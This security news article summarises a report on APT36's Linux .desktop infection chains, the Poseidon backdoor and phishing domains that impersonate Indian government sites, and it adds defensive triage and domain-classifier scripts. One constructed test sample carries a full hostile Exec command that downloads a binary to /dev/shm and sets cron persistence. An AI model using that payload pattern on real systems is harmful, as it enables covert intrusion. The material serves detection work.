Phishing domain impersonating DRDO used in APT36 credential theft campaign | Image: Hunt
APT36, also known as Transparent Tribe, has long been linked to Pakistan-backed cyber-espionage operations. A detailed new report from Hunt Intelligence shows the group has expanded its targeting and refined its tradecraft. The report documents two new infection chains built on Linux .desktop launcher files, an elaborate phishing infrastructure, and the deployment of Poseidon, a Go-based agent for the open-source Mythic command and control framework.
“APT36 has expanded its focus to include Indian railway systems, oil and gas infrastructure, and the Ministry of External Affairs,” the report states.
The scope of the campaign is broad and persistent, with infrastructure still active as of mid-July 2025.
Hunt researchers identified that the initial attack vectors are .desktop files (Linux desktop launcher entries) disguised as PDF documents, a delivery method that combines social engineering with a native OS feature: the file manager shows what looks like a document, but opening it runs whatever the entry's Exec line specifies.
“These files serve as decoys, appearing harmless to the user but executing scripts in the background that download and run malicious files.”
The shell commands embedded in these .desktop files retrieve payloads from remote servers, stage them in hidden directories under /dev/shm/ (a RAM-backed tmpfs, so the files do not survive a reboot and leave little on disk), and establish persistence using cron jobs. The payloads use names such as emacs-bin, crond-98, or p7zip-full to blend in with legitimate binaries.
Variant 1 connects to a single C2 server at 209.38.203.53 and hosts a decoy document on Google Drive, executing a streamlined compromise sequence.
Variant 2 is more resilient, relying on two redundant C2 servers (165.232.114.63 and 165.22.251.224) and a decoy named National Anubhav Scheme-2025.pdf—clearly targeting users interested in Indian employment schemes.
“This setup provides redundancy, allowing communication to continue if one server is taken offline, and increases complexity for defenders.”
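The indicators above (a launcher that looks like a document, an inline shell command, a payload fetched into /dev/shm/, a lookalike binary name, cron persistence) can be checked mechanically. The following triage script is an added example written for this article, not code from the Hunt report; the two sample launchers are constructed, and the download address is a TEST-NET-3 placeholder.

```python
"""Heuristic triage of Linux .desktop launchers that pose as documents.

Added example, not code from the Hunt report. The indicators mirror the
behaviour described in the article. Sample launchers below are constructed;
the IP address is a TEST-NET-3 placeholder.
"""
import re

DOC_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx")
STAGING_DIRS = ("/dev/shm/", "/tmp/", "/var/tmp/")
PERSISTENCE_HINTS = ("crontab", "/etc/cron", "cron.d", "cron.hourly")
LOOKALIKE_NAMES = ("emacs-bin", "crond-98", "p7zip-full")  # names cited in the article


def parse_desktop(text):
    """Return the [Desktop Entry] group as a dict (keys are case-sensitive)."""
    entry, in_main_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_main_group = line == "[Desktop Entry]"
            continue
        if in_main_group and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry


def triage_desktop(text):
    """Return a list of indicator tags; an empty list means nothing stood out."""
    entry = parse_desktop(text)
    if not entry:
        return []
    tags = []
    name = entry.get("Name", "").lower()
    icon = entry.get("Icon", "").lower()
    lowered = entry.get("Exec", "").lower()

    # Name or Icon mimics a document while Type=Application: the file manager
    # shows a PDF, the desktop runs a program.
    if entry.get("Type") == "Application" and (
        name.endswith(DOC_EXTENSIONS) or "pdf" in icon or "document" in icon
    ):
        tags.append("document-disguise")
    # Inline shell with Terminal=false: the user never sees the commands run.
    if entry.get("Terminal", "").lower() == "false" and re.search(r"\b(ba)?sh\s+-c\b", lowered):
        tags.append("hidden-shell")
    if re.search(r"\b(curl|wget)\b", lowered) and re.search(r"https?://", lowered):
        tags.append("downloader")
    if any(d in lowered for d in STAGING_DIRS):
        tags.append("staging-dir")
    if any(n in lowered for n in LOOKALIKE_NAMES):
        tags.append("lookalike-name")
    if any(p in lowered for p in PERSISTENCE_HINTS):
        tags.append("cron-persistence")
    return tags


# Constructed sample shaped like the chains the article describes (not a real capture).
MALICIOUS_DESKTOP = """[Desktop Entry]
Type=Application
Name=National Anubhav Scheme-2025.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "mkdir -p /dev/shm/.cache && curl -s http://203.0.113.10/emacs-bin -o /dev/shm/.cache/emacs-bin && chmod +x /dev/shm/.cache/emacs-bin && (crontab -l 2>/dev/null; echo '*/5 * * * * /dev/shm/.cache/emacs-bin') | crontab - && xdg-open /dev/shm/.cache/decoy.pdf"
"""

# Constructed sample: an ordinary launcher, for contrast.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Icon=accessories-text-editor
Terminal=false
Exec=gedit %U
"""

if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_DESKTOP), ("benign", BENIGN_DESKTOP)):
        print(label, triage_desktop(sample) or "no indicators")
```

Run it over `~/.local/share/applications`, `~/Desktop`, and mail attachment directories; any launcher that earns the `document-disguise` tag together with `hidden-shell` or `downloader` is worth pulling for analysis regardless of the other tags, since a real document never needs an Exec line.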
Once access is established, APT36 deploys Poseidon, a backdoor that:
- Maintains persistent access
- Harvests credentials
- Enables lateral movement
“Poseidon, developed using the open-source Mythic command and control framework and written in Go, supports multiple operating systems.”
C2 servers for Poseidon were identified as 178.128.204.138 and 64.227.189.57, both hosted on DigitalOcean and serving Mythic C2 on port 7443.
Researchers also detected 352 additional active servers with Mythic-related TLS metadata, suggesting that APT36 is not alone in leveraging this framework.
APT36 is simultaneously operating a phishing campaign that impersonates Indian military and government domains. Some examples include:
- drdo.gov.in.nominationdrdo.report
- mod.gov.in.defencepersonnel.support
- iaf.nic.in.ministryofdefenceindia.org
“A common tactic is the use of familiar-looking subdomains combined with misleading top-level domains (TLDs) such as .report, .support, .digital, and .link.”
The domains resolve to IPs hosted by AlexHost—a provider frequently associated with malicious infrastructure. In one case, a fake DRDO login page was used to capture credentials under the guise of a letter titled MoS Defence Letter to DRDO Secy and Scientist.
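All three phishing hostnames above share one shape: a genuine Indian government host name (drdo.gov.in, mod.gov.in, iaf.nic.in) placed as leading labels in front of an unrelated registrable domain. The classifier below is an added example written for this article, not code from the Hunt report; it uses the three hostnames the article lists plus two constructed ones, and its public-suffix handling is a deliberately small stand-in for a real Public Suffix List lookup.

```python
"""Spot hostnames that borrow a trusted government domain as leading labels.

Added example, not from the Hunt report. A real deployment would replace the
INDIA_PUBLIC_SUFFIXES stand-in with a Public Suffix List library.
"""

TRUSTED_ZONES = ("drdo.gov.in", "mod.gov.in", "iaf.nic.in", "gov.in", "nic.in")
SUSPICIOUS_TLDS = (".report", ".support", ".digital", ".link")  # TLDs named in the article
# Second-level suffixes under which the registrable domain is three labels long.
INDIA_PUBLIC_SUFFIXES = ("gov.in", "nic.in", "co.in", "ac.in", "org.in", "net.in")


def registrable_domain(host):
    """Return the part of the name that someone actually registered."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in INDIA_PUBLIC_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def classify_host(host):
    """Return (verdict, registrable_domain, reasons)."""
    host = host.lower().rstrip(".")
    reg = registrable_domain(host)
    # Genuinely inside a trusted zone: the trusted name is the suffix.
    if any(host == z or host.endswith("." + z) for z in TRUSTED_ZONES):
        return "legitimate", reg, []
    reasons = []
    # Lookalike: the trusted name appears as leading labels, not as the suffix.
    for zone in TRUSTED_ZONES:
        if host.startswith(zone + ".") or ("." + zone + ".") in host:
            reasons.append(f"embeds {zone} above registrable domain {reg}")
            break
    for tld in SUSPICIOUS_TLDS:
        if host.endswith(tld):
            reasons.append(f"registered under {tld}")
            break
    if any(r.startswith("embeds") for r in reasons):
        return "lookalike", reg, reasons
    if reasons:
        return "suspicious-tld", reg, reasons
    return "unknown", reg, reasons


def flag_hosts(hosts):
    """Group observed hostnames (e.g. from proxy or DNS logs) by verdict."""
    out = {}
    for h in hosts:
        verdict, reg, reasons = classify_host(h)
        out.setdefault(verdict, []).append((h, reg, reasons))
    return out


# The three hostnames from the article plus two constructed ones for contrast.
OBSERVED = [
    "drdo.gov.in.nominationdrdo.report",
    "mod.gov.in.defencepersonnel.support",
    "iaf.nic.in.ministryofdefenceindia.org",
    "www.drdo.gov.in",
    "updates.example.com",
]

if __name__ == "__main__":
    for verdict, items in flag_hosts(OBSERVED).items():
        for host, reg, reasons in items:
            print(f"{verdict:14} {host:45} {reg:30} {'; '.join(reasons)}")
```

The important design choice is that the check keys on the registrable domain, not on the presence of "gov.in" anywhere in the string: a host is only trusted when the trusted zone is its suffix. Note that iaf.nic.in.ministryofdefenceindia.org is still caught even though .org is not on the unusual-TLD list, because the embedded-zone rule fires on its own.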